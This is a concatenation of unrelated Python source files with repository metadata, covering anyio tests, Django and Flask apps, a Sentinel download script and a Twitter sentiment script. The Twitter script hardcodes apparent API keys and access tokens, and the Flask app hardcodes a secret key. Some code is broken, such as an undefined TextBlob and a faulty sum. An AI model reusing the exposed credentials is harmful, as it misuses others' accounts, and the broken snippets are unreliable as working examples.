objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/70'),
'80': KeuzelijstWaarde(invulwaarde='80',
label='80',
status='ingebruik',
definitie='80 km/h.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/80'),
'90': KeuzelijstWaarde(invulwaarde='90',
label='90',
status='ingebruik',
definitie='90 km/h.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/90'),
'variabel': KeuzelijstWaarde(invulwaarde='variabel',
label='variabel',
status='ingebruik',
definitie='Variabele ingave.',
objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlAlgSnelheidsregime/variabel')
}
@classmethod
def create_dummy_data(cls):
return random.choice(list(map(lambda x: x.invulwaarde,
filter(lambda option: option.status == 'ingebruik', cls.options.values()))))
| [
"david.vlaminck@mow.vlaanderen.be"
] | david.vlaminck@mow.vlaanderen.be |
e7f9f3b65ee5f136748617b0468a728d10b56ab2 | 13b269bc05f0a0bb83887ca0b5250fa7fbdda085 | /tests/test_to_process.py | 1e337ef62c5c2c5708bd0c000e03bfc926d099f2 | [
"MIT"
] | permissive | flyte/anyio | e31866be5307e1c66ebcc6df17ebe2d786f32e0d | 9eb4671547b01f5e3ba0e0ca602b6aceec15af86 | refs/heads/master | 2023-04-25T16:00:09.711501 | 2021-05-22T12:51:25 | 2021-05-22T12:51:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py | import os
import platform
import sys
import time
from functools import partial
import pytest
from anyio import CancelScope, create_task_group, fail_after, to_process, wait_all_tasks_blocked
pytestmark = pytest.mark.anyio
@pytest.fixture(autouse=True)
def check_compatibility(anyio_backend_name):
if anyio_backend_name == 'asyncio':
if platform.system() == 'Windows' and sys.version_info < (3, 8):
pytest.skip('Python < 3.8 uses SelectorEventLoop by default and it does not support '
'subprocesses')
async def test_run_sync_in_process_pool():
"""
Test that the function runs in a different process, and the same process in both calls.
"""
worker_pid = await to_process.run_sync(os.getpid)
assert worker_pid != os.getpid()
assert await to_process.run_sync(os.getpid) == worker_pid
async def test_identical_sys_path():
"""Test that partial() can be used to pass keyword arguments."""
assert await to_process.run_sync(eval, 'sys.path') == sys.path
async def test_partial():
"""Test that partial() can be used to pass keyword arguments."""
assert await to_process.run_sync(partial(sorted, reverse=True), ['a', 'b']) == ['b', 'a']
async def test_exception():
"""Test that exceptions are delivered properly."""
with pytest.raises(ValueError, match='invalid literal for int'):
assert await to_process.run_sync(int, 'a')
async def test_print():
"""Test that print() won't interfere with parent-worker communication."""
worker_pid = await to_process.run_sync(os.getpid)
await to_process.run_sync(print, 'hello')
await to_process.run_sync(print, 'world')
assert await to_process.run_sync(os.getpid) == worker_pid
async def test_cancel_before():
"""
Test that starting to_process.run_sync() in a cancelled scope does not cause a worker
process to be reserved.
"""
with CancelScope() as scope:
scope.cancel()
await to_process.run_sync(os.getpid)
pytest.raises(LookupError, to_process._process_pool_workers.get)
async def test_cancel_during():
"""
Test that cancelling an operation on the worker process causes the process to be killed.
"""
worker_pid = await to_process.run_sync(os.getpid)
with fail_after(4):
async with create_task_group() as tg:
tg.start_soon(partial(to_process.run_sync, cancellable=True), time.sleep, 5)
await wait_all_tasks_blocked()
tg.cancel_scope.cancel()
# The previous worker was killed so we should get a new one now
assert await to_process.run_sync(os.getpid) != worker_pid
| [
"noreply@github.com"
] | flyte.noreply@github.com |
7efa51e2c82d4381c2b16b6c2d5ae76530f80b70 | 3d47bd1876d67401985614a31e04909ec66a203e | /home/migrations/0001_initial.py | 290ef01a18b3dad7ac2d96076b23163858f671ce | [] | no_license | ermi13/setuporignal | 3abcea610941d0137fde9fa82b9b068defb05e33 | 5e12f75dc9725aa13461d6d413476783be6eeddf | refs/heads/master | 2023-01-29T04:18:27.818686 | 2020-12-07T21:34:46 | 2020-12-07T21:34:46 | 317,366,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | # Generated by Django 3.1.3 on 2020-11-30 22:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Service',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(default=0)),
('name', models.CharField(max_length=100)),
('descriptions', models.TextField()),
('newFeatures', models.TextField(null=True)),
('serviceImageUrl', models.FileField(upload_to='')),
],
),
migrations.CreateModel(
name='Plan',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Planame', models.CharField(max_length=100)),
('Plandescription', models.TextField()),
('previous_price', models.IntegerField(null=True)),
('current_price', models.IntegerField()),
('service', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='home.service')),
],
),
]
| [
"ermibling13@gmail.com"
] | ermibling13@gmail.com |
ac4efd009836bdbfc78a0f6aeed1d75784d572f2 | b7c0397e394c81357bcc0e388d03b29a09a6a5a8 | /bin/sentinel1_tile_download.py | 8041f83cd054faf3dc089f2544a75e885ea7eaff | [] | no_license | danhirst98/sentinel2-dataset-pipeline | 89c8d3f18eb495577fd6f5d522f0a2a8a202f071 | 0b88299ac7aba05bf78442af581a602849f9033f | refs/heads/master | 2023-01-12T07:30:30.577607 | 2020-01-19T20:18:10 | 2020-01-19T20:18:10 | 202,750,341 | 1 | 0 | null | 2022-12-26T20:48:00 | 2019-08-16T15:14:20 | Python | UTF-8 | Python | false | false | 775 | py | from sentinelsat.sentinel import SentinelAPI, read_geojson, geojson_to_wkt
from datetime import datetime, timedelta
def sentinel1_tile_download(file,username,password,tilepath):
api = SentinelAPI(username, password, 'https://scihub.copernicus.eu/dhus')
td = timedelta(days=60)
endDate = datetime.now()
startDate = endDate - td
footprint = geojson_to_wkt(read_geojson(file))
print(footprint)
#products = api.query(footprint,
# date=(startDate, endDate),platformname='Sentinel-1')
products = api.query(footprint,
producttype='SLC',
orbitdirection='ASCENDING')
# download all results from the search
api.download_all(products,directorypath=tilepath)
return | [
"danielhirst1998@gmail.com"
] | danielhirst1998@gmail.com |
255f4e48e12b0086a363b02a7d0c3e7cf026e4cf | 191a7f83d964f74a2b3c7faeb4fc47d9c63d521f | /.history/main_20210529123243.py | 4b781a03c1f4d2efb3abc216954d34d660e80018 | [] | no_license | AndreLiu1225/Kinder-Values-Survey | 2a317feee8d5b17c27da2b2116742656e35d8ab9 | 090c27da0c822abb7dfc0ec6e13ae1b3dcb7bbf3 | refs/heads/master | 2023-05-03T00:26:00.481423 | 2021-06-04T03:24:19 | 2021-06-04T03:24:19 | 371,989,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,684 | py | from flask import Flask, render_template, redirect, url_for, flash, request
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import StringField, TextField, SubmitField, IntegerField, SelectField, RadioField
from wtforms.validators import DataRequired, Email, EqualTo, Length, ValidationError
import datetime
import matplotlib.pyplot as plt
app = Flask(__name__)
app.config['SECRET_KEY'] = "0c8973c8a5e001bb0c816a7b56c84f3a"
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///site.db"
db = SQLAlchemy(app)
class Survey(db.Model):
id = db.Column(db.Integer, primary_key=True)
age = db.Column(db.Integer, nullable=False)
email = db.Column(db.String(50), nullable=False)
profession = db.Column(db.String(50), nullable=False)
power = db.Column(db.Integer, nullable=False)
tradition = db.Column(db.Integer, nullable=False)
achievement = db.Column(db.Integer, nullable=False)
stimulation = db.Column(db.Integer, nullable=False)
hedonism = db.Column(db.Integer, nullable=False)
conformity = db.Column(db.Integer, nullable=False)
security = db.Column(db.Integer, nullable=False)
self_direction = db.Column(db.Integer, nullable=False)
benevolence = db.Column(db.Integer, nullable=False)
universalism = db.Column(db.Integer, nullable=False)
date_posted = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
def __repr__(self):
return f"Survey('{self.age}', '{self.name}', '{self.date_posted}')"
class MCQ(FlaskForm):
email = StringField("What is your email?", validators=[DataRequired(), Email(message=('Not a valid email address')), Length(max=50)])
age = IntegerField("Please enter your age", validators=[DataRequired()])
profession = StringField("What is your profession?", validators=[DataRequired(), Length(max=30)])
# Self-Enhancement
power = IntegerField("Do you desire a higher social status and dominance over others? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
hedonism = IntegerField("Is personal gratification the most important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
achievement = IntegerField("Is achievement according to social standards important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
# Conservation
tradition = IntegerField("Do you care about preserving traditions? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
conformity = IntegerField("Do you think restraint of actions against social norms is important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
security = IntegerField("Do you value safety, harmony and stability of society, of relationships, and of self? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
# Openness to change
stimulation = IntegerField("Do you prefer novel and exciting challenges in life? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
self_direction = IntegerField("Do you think independent thought and action are important (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
# Self-transcendence
benevolence = IntegerField("Are preserving and enhancing the welfare of your friends and family the most important? (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
universalism = IntegerField("I find it important to understand, tolerate, appreciate and protect all ethnicities and people. (4- It is my utmost priority, 3-It is important, 2-Doesn't bother me, 1-Not even a thought)", validators=[DataRequired()])
submit = SubmitField("Submit")
@app.route('/', methods=['POST','GET'])
def values_quiz():
form = MCQ()
if form.validate_on_submit():
post = Survey(age=form.age.data, email=form.email.data, profession=form.profession.data, power=form.power.data,
tradition=form.tradition.data, achievement=form.achievement.data, stimulation=form.stimulation.data,
hedonism=form.hedonism.data, conformity=form.conformity.data, self_direction=form.self_direction.data,
benevolence=form.benevolence.data, universalism=form.universalism.data, security=form.security.data)
# if Survey.is_email_in_database(form.email.data):
# flash(f"The user with {form.email.data} has already filled the survey", "danger")
db.session.add(post)
db.session.commit()
flash(f'Survey is completed by {form.email.data}', 'success')
power=form.power.data
tradition=form.tradition.data
achievement=form.achievement.data
stimulation=form.stimulation.data,
hedonism=form.hedonism.data
conformity=form.conformity.data
self_direction=form.self_direction.data
benevolence=form.benevolence.data
universalism=form.universalism.data
security=form.security.data
values = [power, tradition, achievement, stimulation, hedonism, conformity, security, self_direction, benevolence, universalism]
values_labels = ['Openness to Change', 'Self-Transcendence',
'Conservation', 'Self-Enchancement']
openness = [hedonism, stimulation, self_direction]
self_enhancement = [hedonism, achievement, power]
conservation = [tradition, conformity, security]
self_trans = [universalism, benevolence]
total_sum = sum(v[0] for c in values)
open_sum = round(sum(openness)/total_sum*100)
enhance_sum = round(sum(self_enhancement)/total_sum*100)
trans_sum = round(sum(self_trans)/total_sum*100)
cons_sum = round(sum(conservation)/total_sum*100)
sum_v = [open_sum, enhance_sum, trans_sum, cons_sum]
# initiating the range of y ticks
ran = [20,40,60,80,100]
plt.xticks(ran, values_labels)
# Calling bar plot function
plt.bar(ran, sum_v)
plt.title('Percentage obtained on each dynamic values')
plt.ylabel('Percentage')
plt.xlabel('Dynamic value types')
return render_template('data_dashboard.html', image=plt.show())
else:
flash('Ensure all questions are answered correctly', 'warning')
return render_template('MCQ.html', form=form)
@app.route('/results', methods=['GET', 'POST'])
def data_dashboard():
# form=MCQ()
# power = MCQ(request.form.get('power'))
# tradition = MCQ(request.form.get('tradition'))
# achievement = MCQ(request.form.get('achievement'))
# stimulation = MCQ(request.form.get('stimulation'))
# hedonism = MCQ(request.form.get('hedonism'))
# conformity = MCQ(request.form.get('conformity'))
# security = MCQ(request.form.get('security'))
# self_direction = MCQ(request.form.get('self_direction'))
# benevolence = MCQ(request.form.get('benevolence'))
# universalism = MCQ(request.form.get('universalism'))
# values = [power, tradition, achievement, stimulation, hedonism, conformity, security, self_direction, benevolence, universalism]
# values_labels = ['Openness to Change', 'Self-Transcendence',
# 'Conservation', 'Self-Enchancement']
# openness = [hedonism, stimulation, self_direction]
# self_enhancement = [hedonism, achievement, power]
# conservation = [tradition, conformity, security]
# self_trans = [universalism, benevolence]
# total_sum = sum(values)
# open_sum = round(sum(openness)/total_sum*100)
# enhance_sum = round(sum(self_enhancement)/total_sum*100)
# trans_sum = round(sum(self_trans)/total_sum*100)
# cons_sum = round(sum(conservation)/total_sum*100)
# sum_v = [open_sum, enhance_sum, trans_sum, cons_sum]
# # initiating the range of y ticks
# ran = [20,40,60,80,100]
# plt.xticks(ran, values_labels)
# # Calling bar plot function
# plt.bar(ran, sum_v)
# plt.title('Percentage obtained on each dynamic values')
# plt.ylabel('Percentage')
# plt.xlabel('Dynamic value types')
return render_template('data_dashboard.html', image=plt.show())
if __name__ == "__main__":
app.run(debug=True)
| [
"andreliu2004@gmail.com"
] | andreliu2004@gmail.com |
b6c35090a87a08f91a9ef3303b9b4a5b23fcbb98 | a5aabe2e4057d78e687a57a6b560516a7cdb5836 | /tests/extreme/clustering/test_tman.py | c4cab7f0ccaa18b6d758bf361d21d8e50575424a | [
"MIT"
] | permissive | aratz-lasa/py-unsserv | 0ffc09ddab65a11ce917d0faa8b1b5dff091e563 | 6f332385e55d05953186b9a8b7848bca4b878e18 | refs/heads/master | 2022-12-14T21:10:12.397834 | 2020-05-03T11:29:49 | 2020-05-03T11:29:49 | 228,329,158 | 5 | 0 | MIT | 2022-12-08T07:00:55 | 2019-12-16T07:35:20 | Python | UTF-8 | Python | false | false | 4,202 | py | import asyncio
from collections import Counter
from functools import partial
from math import ceil
import pytest
from tests.utils import init_extreme_membership
from unsserv.common.gossip.config import GossipConfig
from unsserv.common.structs import Node
from unsserv.extreme.clustering.t_man import TMan
init_extreme_membership = init_extreme_membership # for flake8 compliance
CLUSTERING_SERVICE_ID = "tman"
@pytest.mark.asyncio
@pytest.fixture
async def init_tman():
tman = None
r_tmans = []
async def _init_tman(newc, r_newcs):
nonlocal tman, r_tmans
tman = TMan(newc)
await tman.join(
CLUSTERING_SERVICE_ID, ranking_function=partial(port_distance, tman.my_node)
)
for r_newc in r_newcs:
r_tman = TMan(r_newc)
await r_tman.join(
CLUSTERING_SERVICE_ID,
ranking_function=partial(port_distance, r_tman.my_node),
)
r_tmans.append(r_tman)
return tman, r_tmans
try:
yield _init_tman
finally:
await tman.leave()
for r_tman in r_tmans:
await r_tman.leave()
def port_distance(my_node: Node, ranked_node: Node):
return abs(my_node.address_info[1] - ranked_node.address_info[1])
@pytest.mark.asyncio
@pytest.mark.parametrize(
"amount",
[GossipConfig.LOCAL_VIEW_SIZE * 2 + 1, GossipConfig.LOCAL_VIEW_SIZE * 2 + 5, 100],
)
async def test_join_tman(init_extreme_membership, init_tman, amount):
newc, r_newcs = await init_extreme_membership(amount)
tman, r_tmans = await init_tman(newc, r_newcs)
await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 7)
await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 45)
cluster_nodes = [tman] + r_tmans
satisfy_ideal_neighbours = []
for cluster in cluster_nodes:
neighbours = set(cluster.get_neighbours())
key_function = partial(port_distance, cluster.my_node)
ideal_neighbours = set(
sorted(map(lambda c_n: c_n.my_node, cluster_nodes), key=key_function)[
1 : GossipConfig.LOCAL_VIEW_SIZE + 1
]
)
satisfies_half_ideal_neighbours = min(
amount, GossipConfig.LOCAL_VIEW_SIZE
) * 0.5 <= len(ideal_neighbours.intersection(neighbours))
satisfy_ideal_neighbours.append(satisfies_half_ideal_neighbours)
assert sum(satisfy_ideal_neighbours) / (amount + 1) >= 0.5
@pytest.mark.asyncio
@pytest.mark.parametrize(
"amount",
[
GossipConfig.LOCAL_VIEW_SIZE + 1,
GossipConfig.LOCAL_VIEW_SIZE + 5,
GossipConfig.LOCAL_VIEW_SIZE + 100,
],
)
async def test_leave_tman(init_extreme_membership, init_tman, amount):
newc, r_newcs = await init_extreme_membership(amount)
tman, r_tmans = await init_tman(newc, r_newcs)
await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 7)
await tman.leave()
await newc.leave()
await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 40)
all_nodes = Counter(
[
item
for sublist in map(lambda n: n.get_neighbours(), r_tmans)
for item in sublist
]
)
nodes_ten_percent = ceil(amount * 0.2)
assert newc.my_node not in all_nodes.keys() or newc.my_node in set(
map(lambda p: p[0], all_nodes.most_common()[-nodes_ten_percent:])
)
@pytest.mark.asyncio
@pytest.mark.parametrize(
"amount",
[
(GossipConfig.LOCAL_VIEW_SIZE * 2) + 1,
(GossipConfig.LOCAL_VIEW_SIZE * 2) + 5,
(GossipConfig.LOCAL_VIEW_SIZE * 2) + 100,
],
) # very high neighbours amount,
# to assure neighbours will change, because it is initailzied by Newscast
async def test_tman_handler(init_extreme_membership, init_tman, amount):
newc, r_newcs = await init_extreme_membership(amount)
tman, r_tmans = await init_tman(newc, r_newcs)
handler_event = asyncio.Event()
async def handler(local_view):
assert isinstance(local_view, list)
nonlocal handler_event
handler_event.set()
tman.add_neighbours_handler(handler)
await asyncio.sleep(GossipConfig.GOSSIPING_FREQUENCY * 15)
assert handler_event.is_set()
| [
"aratzml@opendeusto.es"
] | aratzml@opendeusto.es |
475f48e7502aeb5696e6f5a6fcf4b7325d61683d | 02a39a3391b011d69034d51fe447bb53cc5c3c89 | /cancer/authentications/urls.py | 88766f64862044b2bde9817cae805601cea800b0 | [] | no_license | warlikedhruv/djnago-lung-cancer-prediction | a35dbaca9214f7211da1bb5630a9680d5c98e021 | 3990cc4502214a19592f8d7e5a7ca93125fed950 | refs/heads/main | 2023-06-22T22:05:57.769444 | 2021-07-12T13:55:27 | 2021-07-12T13:55:27 | 385,265,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | from django.urls import path, include
from .views import logout, login, register
urlpatterns = [
path('login', login, name='login'),
path('register', register, name='register'),
path('logout', logout, name='logout')
]
| [
"63941632+warlikedhruv@users.noreply.github.com"
] | 63941632+warlikedhruv@users.noreply.github.com |
a6959477826fd63adfb926c0f40332beeb4dadfd | 171610ea4157109b1f271fda241330c29a66c581 | /classobj.py | e7d382418ac0bff0106f3d786abab9a28c93f66e | [] | no_license | DerrenDsouza/Python-Programming | 731e3ba38c38d40b8bb32913e22753c2e43a30ad | 62286a1c2534a986b77227d7b3397630d8dbd4fb | refs/heads/master | 2020-04-25T08:44:17.574478 | 2019-09-07T06:55:01 | 2019-09-07T06:55:01 | 172,656,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py | class student:
h=0
def __init__(self):
self.h=6
def my_func(self,k):
print("hi I am in class")
self.h=k
print(self.h)
o=student()
print(o.h)
o1=student()
print(o1.h)
o.my_func(2)
o1.my_func(4)
o3=student()
print(o3.h) | [
"noreply@github.com"
] | DerrenDsouza.noreply@github.com |
1350cf16a2da56ca1ba8ffd444d30e82fdde2cb4 | 2a2b36a603e1fefeaca902381b6377a44bb503af | /tp/models/entity.py | 328462036afe3f53184468ea48d3ba29ee070271 | [] | no_license | nenad/TPpy | 1c3f848df48f4cef4a6dcd3fb01efa401d0457a3 | 8b261cdea8e1d418288397d8e62ad2b9a7246385 | refs/heads/master | 2021-05-30T23:26:26.344356 | 2016-04-15T13:14:57 | 2016-04-15T13:14:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | import types
class EntityType:
def __init__(self):
pass
BUG = 'Bug'
USERSTORY = 'UserStory'
TASK = 'Task'
class Entity:
def __init__(self):
self.id = 0 # Integer
def __str__(self):
return self.to_JSON()
def to_JSON(self):
jsonstr = ''
for var in self.__dict__:
value = self.__dict__[var]
if value is not None:
if isinstance(value, types.ListType):
jsonstr += var + ':\n'
if len(value) == 0:
jsonstr += '\tempty' + '\n'
for obj in value:
jsonstr += '\t\n'.join(['\t' + line for line in obj.__str__().splitlines()]) + '\n\n'
else:
jsonstr += var + ' => ' + value.__str__() + '\n'
return jsonstr
| [
"n.stojanovik@voxteneo.com.mk"
] | n.stojanovik@voxteneo.com.mk |
3ff3f10ea73afba3d28f0fe60aab194cddbc1ed0 | 250967d919697ceaa9115e1f1a2ff96ff6cb22bb | /chapter 5/HW05-02.py | b392296fa2c1302face6863ce17f6f288fd5b480 | [] | no_license | saikirankondapalli03/pythonmath | 881ba67ba49b0c62e4b3dab474864b9df45e338f | 283493c90bf4af2fabd69016de397d141cba75e8 | refs/heads/master | 2020-06-18T04:21:45.269512 | 2019-10-15T15:38:08 | 2019-10-15T15:38:08 | 196,162,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,601 | py | '''
@author Sai
File name: HW05-02.py
Date created: 7/22/2019
Date last modified: 7/22/2019
Python Version: 3.1
This file is all about proof of law of large numbers in python
for law of large numbers please refer to
a) https://en.wikipedia.org/wiki/Law_of_large_numbers
b) https://en.wikipedia.org/wiki/Law_of_large_numbers#/media/File:Lawoflargenumbers.svg
'''
import random
import symbol
def roll():
return random.randint(1, 6)
def calculate_avg(no_of_trials):
i =0
new_list= []
for i in range(1,no_of_trials+1):
val= roll()
new_list.append(val)
avg = sum(new_list)/len(new_list)
return avg
from pylab import plot,show,title, xlabel, ylabel, legend , savefig
if __name__ == "__main__":
input_trials = [10,100,1000,10000,100000,500000]
output_trials = []
for input in input_trials:
result= calculate_avg(input)
output_trials.append(result)
print(input_trials)
print(output_trials)
#we already know that theoritical mean is 3.5 (as per the calculation in page no 143 from the textbook )
#So for any number of trials , it is always close to 3.5
#So , now given that input_trials = [10,100,1000,10000,100000,500000] is of length 6 , create input of length 6 in which each element is 3.5
theoritical_mean_trials = [3.5,3.5,3.5,3.5,3.5,3.5]
plot(input_trials, output_trials, input_trials, theoritical_mean_trials )
title('Average dice roll by number of trials')
xlabel('Number of trials')
ylabel('Observed averages')
legend(['Theotrical Mean','Observed averages'])
show()
| [
"saikirankondapalli03@gmail.com"
] | saikirankondapalli03@gmail.com |
a950d52c318d45b409f3ab1fe17a0e058800c942 | 256c6f6d9cabc1cb3b81e8a7deb4ca847bb8712a | /nlpproject/asgi.py | 37bde0b1c8f62bcbe29898da1a90dcf83f007e5c | [] | no_license | rtodinova/FakeNewsDetection | a871766b7487490202f83d615ebbee99f7578755 | 345d94e13c3d11a8caa8fd5fc075c6c90bbfb548 | refs/heads/master | 2020-12-27T06:28:24.326436 | 2020-02-15T09:49:44 | 2020-02-15T09:49:44 | 237,795,548 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
ASGI config for nlpproject project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'nlpproject.settings')
application = get_asgi_application()
| [
"rtodinova@uni-sofia.bg"
] | rtodinova@uni-sofia.bg |
ea4001e48094948ae3c803340f078418ff9e8753 | 2651a539efcf5501488786f125860ecb7e2d3169 | /textblob_sentiments.py | 85fd4b68a39931910d93ae1bc3f64d48441690a8 | [] | no_license | patankaraditya1/Twitter-Sentiment-Analysis | 4f968efc506eda7a59dfd3edde3435094370e813 | b948dfd4a005740303e418327a0c603f7ba27bde | refs/heads/master | 2020-03-12T00:46:55.871101 | 2018-04-20T12:21:12 | 2018-04-20T12:21:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,541 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Mar 24 10:55:25 2018
@author: ADITYA
"""
import sys,tweepy,csv,re
import textblob
#from textblob import TextBlob
import matplotlib.pyplot as plt
class SentimentAnalysis:
def __init__(self):
self.tweets = []
self.tweetText = []
def DownloadData(self):
# authenticating
consumerKey = 'dPPKLnVHGcELkDvkiuNZzPACA'
consumerSecret = 'TMwm95swlF782tx5rTWQGvLS3knaXlT59TNu2YY8yRKy8BQmi0'
accessToken = '2375257315-TBmrA0ylrG5dTVDAaaDx8jyQm6INHiRNtoQDfBY'
accessTokenSecret = 'Hob8EgVlroUJSeiSFVqPwOIgtueEJm5zpJJ62XG4IT8nT'
auth = tweepy.OAuthHandler(consumerKey, consumerSecret)
auth.set_access_token(accessToken, accessTokenSecret)
api = tweepy.API(auth)
# input for term to be searched and how many tweets to search
searchTerm = input("Enter Keyword/Tag to search about: ")
NoOfTerms = int(input("Enter how many tweets to search: "))
# searching for tweets
self.tweets = tweepy.Cursor(api.search, q=searchTerm, lang = "en").items(NoOfTerms)
# Open/create a file to append data to
csvFile = open('result.csv', 'a')
# Use csv writer
csvWriter = csv.writer(csvFile)
# creating some variables to store info
polarity = 0
positive = 0
wpositive = 0
spositive = 0
negative = 0
wnegative = 0
snegative = 0
neutral = 0
# iterating through tweets fetched
for tweet in self.tweets:
#Append to temp so that we can store in csv later. I use encode UTF-8
self.tweetText.append(self.cleanTweet(tweet.text).encode('utf-8'))
# print (tweet.text.translate(non_bmp_map)) #print tweet's text
analysis = TextBlob(tweet.text)
# print(analysis.sentiment) # print tweet's polarity
polarity += analysis.sentiment.polarity # adding up polarities to find the average later
if (analysis.sentiment.polarity == 0): # adding reaction of how people are reacting to find average later
neutral += 1
elif (analysis.sentiment.polarity > 0 and analysis.sentiment.polarity <= 0.3):
wpositive += 1
elif (analysis.sentiment.polarity > 0.3 and analysis.sentiment.polarity <= 0.6):
positive += 1
elif (analysis.sentiment.polarity > 0.6 and analysis.sentiment.polarity <= 1):
spositive += 1
elif (analysis.sentiment.polarity > -0.3 and analysis.sentiment.polarity <= 0):
wnegative += 1
elif (analysis.sentiment.polarity > -0.6 and analysis.sentiment.polarity <= -0.3):
negative += 1
elif (analysis.sentiment.polarity > -1 and analysis.sentiment.polarity <= -0.6):
snegative += 1
# Write to csv and close csv file
csvWriter.writerow(self.tweetText)
csvFile.close()
# finding average of how people are reacting
positive = self.percentage(positive, NoOfTerms)
wpositive = self.percentage(wpositive, NoOfTerms)
spositive = self.percentage(spositive, NoOfTerms)
negative = self.percentage(negative, NoOfTerms)
wnegative = self.percentage(wnegative, NoOfTerms)
snegative = self.percentage(snegative, NoOfTerms)
neutral = self.percentage(neutral, NoOfTerms)
# finding average reaction
polarity = polarity / NoOfTerms
# printing out data
print("How people are reacting on " + searchTerm + " by analyzing " + str(NoOfTerms) + " tweets.")
print()
print("General Report: ")
if (polarity == 0):
print("Neutral")
elif (polarity > 0 and polarity <= 0.3):
print("Weakly Positive")
elif (polarity > 0.3 and polarity <= 0.6):
print("Positive")
elif (polarity > 0.6 and polarity <= 1):
print("Strongly Positive")
elif (polarity > -0.3 and polarity <= 0):
print("Weakly Negative")
elif (polarity > -0.6 and polarity <= -0.3):
print("Negative")
elif (polarity > -1 and polarity <= -0.6):
print("Strongly Negative")
print()
print("Detailed Report: ")
print(str(positive) + "% people thought it was positive")
print(str(wpositive) + "% people thought it was weakly positive")
print(str(spositive) + "% people thought it was strongly positive")
print(str(negative) + "% people thought it was negative")
print(str(wnegative) + "% people thought it was weakly negative")
print(str(snegative) + "% people thought it was strongly negative")
print(str(neutral) + "% people thought it was neutral")
self.plotPieChart(positive, wpositive, spositive, negative, wnegative, snegative, neutral, searchTerm, NoOfTerms)
def cleanTweet(self, tweet):
# Remove Links, Special Characters etc from tweet
return ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t]) | (\w +:\ / \ / \S +)", " ", tweet).split())
# function to calculate percentage
def percentage(self, part, whole):
temp = 100 * float(part) / float(whole)
return format(temp, '.2f')
def plotPieChart(self, positive, wpositive, spositive, negative, wnegative, snegative, neutral, searchTerm, noOfSearchTerms):
labels = ['Positive [' + str(positive) + '%]', 'Weakly Positive [' + str(wpositive) + '%]','Strongly Positive [' + str(spositive) + '%]', 'Neutral [' + str(neutral) + '%]',
'Negative [' + str(negative) + '%]', 'Weakly Negative [' + str(wnegative) + '%]', 'Strongly Negative [' + str(snegative) + '%]']
sizes = [positive, wpositive, spositive, neutral, negative, wnegative, snegative]
colors = ['yellowgreen','lightgreen','darkgreen', 'gold', 'red','lightsalmon','darkred']
patches, texts = plt.pie(sizes, colors=colors, startangle=90)
plt.legend(patches, labels, loc="best")
plt.title('How people are reacting on ' + searchTerm + ' by analyzing ' + str(noOfSearchTerms) + ' Tweets.')
plt.axis('equal')
plt.tight_layout()
plt.show()
if __name__== "__main__":
sa = SentimentAnalysis()
sa.DownloadData() | [
"noreply@github.com"
] | patankaraditya1.noreply@github.com |
7bf05a660f374d99b85ca4d77340b5fcd77ccf5c | c4a25d72f38dedf224431c968c8894ab1b72a2d5 | /job/admin.py | 4b66d950b677ae90c4ecb16a59a763e309a9570f | [] | no_license | ahmedsaad2011559/django-Job-Board | d38fb345eaa88a8e4a38259e27001b34cecca6e9 | 7ca4b2c931730af461bcbb3f429507a365dc3407 | refs/heads/main | 2023-06-29T20:55:46.036656 | 2021-08-06T09:11:23 | 2021-08-06T09:11:23 | 391,702,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | from django.contrib import admin
# Register your models here.
from .models import Job,Category
admin.site.register(Job)
admin.site.register(Category)
| [
"ahmed2011559.ahmedsaadmohamed989@gmail.com"
] | ahmed2011559.ahmedsaadmohamed989@gmail.com |
